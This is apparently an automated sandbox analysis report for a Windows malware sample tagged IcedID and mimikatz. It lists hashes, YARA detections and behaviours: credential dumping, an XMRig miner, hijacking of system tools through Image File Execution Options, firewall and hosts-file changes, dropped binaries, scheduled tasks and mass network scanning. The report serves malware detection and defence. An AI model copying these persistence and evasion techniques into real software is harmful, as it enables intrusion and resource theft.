Analysis
max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system
submitted: 11-04-2024 06:44
Behavioral task: behavioral1
Sample: 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe
Resource: win7-20240221-en

General
Target: 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe
Size: 8.6MB
MD5: 70b2d62d7c3e0f6eaeb1db24720637b9
SHA1: 3e3105a8dc60536b511edf5f7d93ee1bd73a5eb0
SHA256: c43f1049e53282c7adeed911eefd446ab50b451d9c1c746c680c9bb75fb65a64
SHA512: a584f98afb0e4dfe845fbbc8db65478656837bdbc71651d8b041af83c2f786fbbae7314d1e5c708c4d0b1b16dca23ea029079f65f87ccfb66f466a3f35319ddb
SSDEEP: 196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

Mimikatz
mimikatz is an open source tool to dump credentials on Windows.

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
description | pid | process | target process
PID 3752 created 2204 | 3752 | euikgtl.exe | spoolsv.exe

Contacts a large (30803) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/2552-136-0x00007FF79B150000-0x00007FF79B23E000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

UPX dump on OEP (original entry point) 39 IoCs
Processes:
resource | yara_rule
behavioral2/memory/2808-0-0x0000000000400000-0x0000000000A9B000-memory.dmp | UPX
C:\Windows\itspapsg\euikgtl.exe | UPX
behavioral2/memory/852-7-0x0000000000400000-0x0000000000A9B000-memory.dmp | UPX
C:\Windows\lubbeisit\Corporate\vfshost.exe | UPX
behavioral2/memory/2552-135-0x00007FF79B150000-0x00007FF79B23E000-memory.dmp | UPX
behavioral2/memory/2552-136-0x00007FF79B150000-0x00007FF79B23E000-memory.dmp | UPX
C:\Windows\Temp\lubbeisit\jgqtbilab.exe | UPX
behavioral2/memory/1856-140-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/1856-154-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
C:\Windows\Temp\tskqpisje\cktkgb.exe | UPX
behavioral2/memory/4524-161-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | UPX
behavioral2/memory/3808-170-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/1616-174-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/1656-178-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/4524-181-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | UPX
behavioral2/memory/4796-183-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/3600-188-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/1692-192-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/2728-195-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/2728-197-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/2244-201-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/4524-203-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | UPX
behavioral2/memory/3316-206-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/3216-210-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/4524-212-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | UPX
behavioral2/memory/4472-215-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/4348-219-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/4524-222-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | UPX
behavioral2/memory/3724-224-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/3800-228-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/1996-231-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/4524-232-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | UPX
behavioral2/memory/2316-234-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | UPX
behavioral2/memory/4524-247-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | UPX
behavioral2/memory/4524-248-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | UPX
behavioral2/memory/4524-249-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | UPX
behavioral2/memory/4524-251-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | UPX
behavioral2/memory/4524-253-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | UPX
behavioral2/memory/4524-254-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | UPX

XMRig Miner payload 11 IoCs
Processes:
resource | yara_rule
behavioral2/memory/4524-181-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | xmrig
behavioral2/memory/4524-203-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | xmrig
behavioral2/memory/4524-212-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | xmrig
behavioral2/memory/4524-222-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | xmrig
behavioral2/memory/4524-232-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | xmrig
behavioral2/memory/4524-247-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | xmrig
behavioral2/memory/4524-248-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | xmrig
behavioral2/memory/4524-249-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | xmrig
behavioral2/memory/4524-251-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | xmrig
behavioral2/memory/4524-253-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | xmrig
behavioral2/memory/4524-254-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | xmrig

mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
resource | yara_rule
behavioral2/memory/2808-0-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
C:\Windows\itspapsg\euikgtl.exe | mimikatz
behavioral2/memory/852-7-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
behavioral2/memory/2552-136-0x00007FF79B150000-0x00007FF79B23E000-memory.dmp | mimikatz

Drops file in Drivers directory 3 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | euikgtl.exe
File created | C:\Windows\system32\drivers\npf.sys | wpcap.exe
File created | C:\Windows\system32\drivers\etc\hosts | euikgtl.exe

Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
pid | process
852 | netsh.exe
2672 | netsh.exe

Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe | euikgtl.exe

Executes dropped EXE 28 IoCs
Processes:
pid | process
852 | euikgtl.exe
3752 | euikgtl.exe
4536 | wpcap.exe
4032 | bqalurljg.exe
2552 | vfshost.exe
1856 | jgqtbilab.exe
3480 | xohudmc.exe
3620 | fkjvgk.exe
4524 | cktkgb.exe
3808 | jgqtbilab.exe
1616 | jgqtbilab.exe
1656 | jgqtbilab.exe
4796 | jgqtbilab.exe
3600 | jgqtbilab.exe
1692 | jgqtbilab.exe
2728 | jgqtbilab.exe
2244 | jgqtbilab.exe
3316 | jgqtbilab.exe
3216 | jgqtbilab.exe
4472 | jgqtbilab.exe
4348 | jgqtbilab.exe
3724 | jgqtbilab.exe
3800 | jgqtbilab.exe
1996 | jgqtbilab.exe
2316 | jgqtbilab.exe
3444 | euikgtl.exe
1452 | nstjgbafp.exe
232 | euikgtl.exe

Loads dropped DLL 12 IoCs
Processes:
pid | process
4536 | wpcap.exe (×9)
4032 | bqalurljg.exe (×3)

Processes:
resource | yara_rule
C:\Windows\lubbeisit\Corporate\vfshost.exe | upx
behavioral2/memory/2552-135-0x00007FF79B150000-0x00007FF79B23E000-memory.dmp | upx
behavioral2/memory/2552-136-0x00007FF79B150000-0x00007FF79B23E000-memory.dmp | upx
C:\Windows\Temp\lubbeisit\jgqtbilab.exe | upx
behavioral2/memory/1856-140-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/1856-154-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
C:\Windows\Temp\tskqpisje\cktkgb.exe | upx
behavioral2/memory/4524-161-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | upx
behavioral2/memory/3808-170-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/1616-174-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/1656-178-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/4524-181-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | upx
behavioral2/memory/4796-183-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/3600-188-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/1692-192-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/2728-195-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/2728-197-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/2244-201-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/4524-203-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | upx
behavioral2/memory/3316-206-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/3216-210-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/4524-212-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | upx
behavioral2/memory/4472-215-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/4348-219-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/4524-222-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | upx
behavioral2/memory/3724-224-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/3800-228-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/1996-231-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/4524-232-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | upx
behavioral2/memory/2316-234-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp | upx
behavioral2/memory/4524-247-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | upx
behavioral2/memory/4524-248-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | upx
behavioral2/memory/4524-249-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | upx
behavioral2/memory/4524-251-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | upx
behavioral2/memory/4524-253-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | upx
behavioral2/memory/4524-254-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp | upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
66 | ifconfig.me
67 | ifconfig.me

Creates a Windows Service

Drops file in System32 directory 18 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | euikgtl.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | euikgtl.exe
File created | C:\Windows\SysWOW64\fkjvgk.exe | xohudmc.exe
File opened for modification | C:\Windows\SysWOW64\fkjvgk.exe | xohudmc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | euikgtl.exe
File created | C:\Windows\system32\wpcap.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | euikgtl.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | euikgtl.exe
File created | C:\Windows\system32\Packet.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | euikgtl.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | euikgtl.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | euikgtl.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | euikgtl.exe
File created | C:\Windows\SysWOW64\pthreadVC.dll | wpcap.exe
File created | C:\Windows\SysWOW64\wpcap.dll | wpcap.exe
File created | C:\Windows\SysWOW64\Packet.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A | euikgtl.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A | euikgtl.exe

Drops file in Program Files directory 3 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\WinPcap\uninstall.exe | wpcap.exe
File created | C:\Program Files\WinPcap\rpcapd.exe | wpcap.exe
File created | C:\Program Files\WinPcap\LICENSE | wpcap.exe

Drops file in Windows directory 60 IoCs
Processes:
description | ioc | process
File created | C:\Windows\lubbeisit\UnattendGC\specials\ucl.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\schoedcl.exe | euikgtl.exe
File opened for modification | C:\Windows\itspapsg\spoolsrv.xml | euikgtl.exe
File opened for modification | C:\Windows\itspapsg\schoedcl.xml | euikgtl.exe
File created | C:\Windows\lubbeisit\abkgigiey\Packet.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\xdvl-0.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\spoolsrv.exe | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\docmicfg.xml | euikgtl.exe
File opened for modification | C:\Windows\itspapsg\svschost.xml | euikgtl.exe
File opened for modification | C:\Windows\lubbeisit\abkgigiey\Result.txt | nstjgbafp.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\svschost.xml | euikgtl.exe
File opened for modification | C:\Windows\itspapsg\docmicfg.xml | euikgtl.exe
File created | C:\Windows\lubbeisit\abkgigiey\bqalurljg.exe | euikgtl.exe
File created | C:\Windows\itspapsg\svschost.xml | euikgtl.exe
File created | C:\Windows\lubbeisit\Corporate\vfshost.exe | euikgtl.exe
File opened for modification | C:\Windows\lubbeisit\abkgigiey\Packet.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\trfo-2.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\schoedcl.xml | euikgtl.exe
File created | C:\Windows\lubbeisit\abkgigiey\nstjgbafp.exe | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\libxml2.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\ssleay32.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\vimpcsvc.exe | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\Shellcode.ini | euikgtl.exe
File created | C:\Windows\lubbeisit\abkgigiey\ip.txt | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\posh-0.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\trch-1.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\libeay32.dll | euikgtl.exe
File created | C:\Windows\itspapsg\schoedcl.xml | euikgtl.exe
File created | C:\Windows\lubbeisit\upbdrjv\swrpwe.exe | euikgtl.exe
File opened for modification | C:\Windows\itspapsg\euikgtl.exe | 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe
File created | C:\Windows\lubbeisit\abkgigiey\wpcap.exe | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\AppCapture64.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\AppCapture32.dll | euikgtl.exe
File opened for modification | C:\Windows\itspapsg\vimpcsvc.xml | euikgtl.exe
File created | C:\Windows\itspapsg\euikgtl.exe | 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\crli-0.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\tibe-2.dll | euikgtl.exe
File created | C:\Windows\itspapsg\spoolsrv.xml | euikgtl.exe
File created | C:\Windows\lubbeisit\Corporate\mimilib.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\spoolsrv.xml | euikgtl.exe
File created | C:\Windows\lubbeisit\Corporate\mimidrv.sys | euikgtl.exe
File created | C:\Windows\ime\euikgtl.exe | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\zlib1.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\svschost.exe | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\docmicfg.exe | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\docmicfg.xml | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\vimpcsvc.xml | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\cnli-1.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\coli-0.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\exma-1.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\tucl-1.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\svschost.xml | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\schoedcl.xml | euikgtl.exe
File created | C:\Windows\itspapsg\vimpcsvc.xml | euikgtl.exe
File created | C:\Windows\itspapsg\docmicfg.xml | euikgtl.exe
File created | C:\Windows\lubbeisit\abkgigiey\scan.bat | euikgtl.exe
File created | C:\Windows\lubbeisit\abkgigiey\wpcap.dll | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\vimpcsvc.xml | euikgtl.exe
File created | C:\Windows\lubbeisit\UnattendGC\specials\spoolsrv.xml | euikgtl.exe
File opened for modification | C:\Windows\lubbeisit\Corporate\log.txt | cmd.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
4184 | sc.exe
1972 | sc.exe
4768 | sc.exe
2832 | sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

NSIS installer 3 IoCs
Processes:
resource | yara_rule
C:\Windows\itspapsg\euikgtl.exe | nsis_installer_2
C:\Windows\lubbeisit\abkgigiey\wpcap.exe | nsis_installer_1
C:\Windows\lubbeisit\abkgigiey\wpcap.exe | nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
2732 | schtasks.exe
2528 | schtasks.exe
4496 | schtasks.exe

Modifies data under HKEY_USERS 43 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | euikgtl.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
